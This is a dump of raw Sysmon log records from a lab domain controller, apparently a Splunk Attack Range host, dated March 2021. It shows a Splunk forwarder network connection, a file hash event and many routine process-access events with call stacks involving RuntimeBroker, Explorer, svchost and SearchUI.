12:05:55.446{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53646-false10.0.1.12-8000- 23542300x80000000000000009769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:56.551{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CCBE8779EE761AB4E7EF5DB015D6375,SHA256=99C7FAB33F023F52F6FA073000A5C823F554A624966B45A4B6229628075496F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.972{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.972{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.972{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.972{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.956{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.956{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000009795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000009794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43563772C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43563772C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.941{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.925{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.925{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.925{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:57.909{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 